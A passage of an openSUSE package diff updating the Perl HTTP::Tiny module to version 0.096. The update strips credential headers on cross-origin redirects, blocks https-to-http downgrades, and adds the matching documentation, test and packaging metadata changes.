C<allow_credentialed_redirects> attribute to opt out. +#pod #pod A hashref of options may be appended to modify the request. #pod #pod Valid options are: @@ -427,7 +440,7 @@ #pod #pod =for :list #pod * C<success> — -#pod Boolean indicating whether the operation returned a 2XX status code +#pod Boolean indicating whether the operation returned a C<2XX> status code #pod * C<url> — #pod URL that provided the response. This is the URL of the request unless #pod there were redirections, in which case it is the last URL queried @@ -458,6 +471,7 @@ #pod =cut my %idempotent = map { $_ => 1 } qw/GET HEAD PUT DELETE OPTIONS TRACE/; +my %sensitive_headers = map { $_ => 1 } qw/authorization cookie proxy-authorization/; sub request { my ($self, $method, $url, $args) = @_; @@ -842,6 +856,7 @@ for ($self->{default_headers}, $args->{headers}) { next unless defined; while (my ($k, $v) = each %$_) { + next if $args->{_strip_credentials} && exists $sensitive_headers{lc $k}; $request->{headers}{lc $k} = $v; $request->{header_case}{lc $k} = $k; } @@ -969,9 +984,24 @@ and $headers->{location} and @{$args->{_redirects}} < $self->{max_redirect} ) { - my $location = ($headers->{location} =~ /^\//) + my $location = $headers->{location} =~ m{^//} + ? "$request->{scheme}:$headers->{location}" + : $headers->{location} =~ m{^/} ? "$request->{scheme}://$request->{host_port}$headers->{location}" - : $headers->{location} ; + : $headers->{location}; + my ($to_scheme, $to_host, $to_port) = $self->_split_url($location); + if (!$self->{allow_downgrade} && $request->{scheme} eq 'https' && $to_scheme eq 'http' ) { + return; + } + if ( + !$self->{allow_credentialed_redirects} + && ( $request->{scheme} ne $to_scheme + || $request->{host} ne $to_host + || $request->{port} ne $to_port ) + ) { + $args->{_strip_credentials} = 1; + } + return (($status eq '303' ? 'GET' : $method), $location); } return; @@ -1776,7 +1806,7 @@ =head1 VERSION -version 0.094 +version 0.096 =head1 SYNOPSIS @@ -1821,7 +1851,15 @@ =item * -C<agent> — A user-agent string (defaults to 'HTTP-Tiny/$VERSION'). If C<agent> — ends in a space character, the default user-agent string is appended. +C<agent> — A user-agent string (defaults to 'C<HTTP-Tiny/$VERSION>'). If C<agent> — ends in a space character, the default user-agent string is appended. + +=item * + +C<allow_credentialed_redirects> - If a C<3XX> redirects to a different scheme, host or port, by default HTTP::Tiny will strip away caller-supplied C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers from the redirected request and from all subsequent requests in the chain. Set this to a true value to revert to the legacy behavior of forwarding those headers. Default is C<false>. + +=item * + +C<allow_downgrade> — If a C<3XX> redirect changes the scheme from C<https> to plain C<http>, HTTP::Tiny will by default refuse to follow it, returning the C<3XX> response. Set this to a true value to revert to the legacy behavior of redirecting C<https> to C<http>. Default is C<false>. =item * @@ -1919,7 +1957,7 @@ URL must have unsafe characters escaped and international domain names encoded. See C<request()> for valid options and a description of the response. -The C<success> field of the response will be true if the status code is 2XX. +The C<success> field of the response will be true if the status code is C<2XX>. =head2 post_form @@ -1937,7 +1975,7 @@ encoded. See C<request()> for valid options and a description of the response. Any C<content-type> header or content in the options hashref will be ignored. -The C<success> field of the response will be true if the status code is 2XX. +The C<success> field of the response will be true if the status code is C<2XX>. =head2 mirror @@ -1953,8 +1991,8 @@ may specify a different C<If-Modified-Since> header yourself in the C<< $options->{headers} >> hash. -The C<success> field of the response will be true if the status code is 2XX -or if the status code is 304 (unmodified). +The C<success> field of the response will be true if the status code is C<2XX> +or if the status code is C<304> (unmodified). If the file was modified and the server response includes a properly formatted C<Last-Modified> header, the file modification time will @@ -1974,8 +2012,7 @@ how this applies to redirection. If the URL includes a "user:password" stanza, they will be used for Basic-style -authorization headers. (Authorization headers will not be included in a -redirected request.) For example: +authorization headers. For example: $http->request('GET', 'http://Aladdin:open [email protected]/'); @@ -1984,6 +2021,10 @@ $http->request('GET', 'http://john%40example.com:[email protected]/'); +Caller-supplied C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers +are stripped on cross-origin redirects. See L</new>'s +C<allow_credentialed_redirects> attribute to opt out. + A hashref of options may be appended to modify the request. Valid options are: @@ -2041,7 +2082,7 @@ =item * -C<success> — Boolean indicating whether the operation returned a 2XX status code +C<success> — Boolean indicating whether the operation returned a C<2XX> status code =item * @@ -2121,6 +2162,8 @@ =for Pod::Coverage SSL_options agent +allow_credentialed_redirects +allow_downgrade cookie_jar default_headers http_proxy @@ -2336,10 +2379,10 @@ =item * Redirection is very strict against the specification. Redirection is only -automatic for response codes 301, 302, 307 and 308 if the request method is -'GET' or 'HEAD'. Response code 303 is always converted into a 'GET' -redirection, as mandated by the specification. There is no automatic support -for status 305 ("Use proxy") redirections. +automatic for response codes C<301>, C<302>, C<307> and C<308> if the request +method is 'GET' or 'HEAD'. Response code C<303> is always converted into a +'GET' redirection, as mandated by the specification. There is no automatic +support for status C<305> ("Use proxy") redirections. =item * diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/t/001_api.t new/HTTP-Tiny-0.096/t/001_api.t --- old/HTTP-Tiny-0.094/t/001_api.t 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/t/001_api.t 2026-06-08 11:21:52.000000000 +0200 @@ -7,8 +7,9 @@ use HTTP::Tiny; my @accessors = qw( - agent default_headers http_proxy https_proxy keep_alive local_address - max_redirect max_size proxy no_proxy timeout SSL_options verify_SSL cookie_jar + agent allow_credentialed_redirects allow_downgrade default_headers http_proxy + https_proxy keep_alive local_address max_redirect max_size proxy no_proxy timeout + SSL_options verify_SSL cookie_jar ); my @methods = qw( new get head put post patch delete post_form request mirror www_form_urlencode can_ssl diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/xt/author/pod-spell.t new/HTTP-Tiny-0.096/xt/author/pod-spell.t --- old/HTTP-Tiny-0.094/xt/author/pod-spell.t 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/xt/author/pod-spell.t 2026-06-08 11:21:52.000000000 +0200 @@ -10,7 +10,6 @@ add_stopwords(<DATA>); all_pod_files_spelling_ok( qw( bin lib ) ); __DATA__ -2XX Alan Alders Alessandro ++++++ _scmsync.obsinfo ++++++ --- /var/tmp/diff_new_pack.5F5B63/_old 2026-06-08 16:54:57.545436627 +0200 +++ /var/tmp/diff_new_pack.5F5B63/_new 2026-06-08 16:54:57.561437290 +0200 @@ -1,6 +1,6 @@ -mtime: 1779097238 -commit: 649629c19d0f92d28444356031b724e8e8328508a3863e13ef025463c2391765 +mtime: 1780912645 +commit: 74164c707b14e62b68474eab69830a01acb3bef6e038044e2c5a1c9027754b7c url: https://src.opensuse.org/perl/perl-HTTP-Tiny -revision: 649629c19d0f92d28444356031b724e8e8328508a3863e13ef025463c2391765 +revision: 74164c707b14e62b68474eab69830a01acb3bef6e038044e2c5a1c9027754b7c projectscmsync: https://src.opensuse.org/perl/_ObsPrj ++++++ build.specials.obscpio ++++++ ++++++ build.specials.obscpio ++++++ diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/.gitignore new/.gitignore --- old/.gitignore 1970-01-01 01:00:00.000000000 +0100 +++ new/.gitignore 2026-06-08 11:57:25.000000000 +0200 @@ -0,0 +1 @@ +.osc
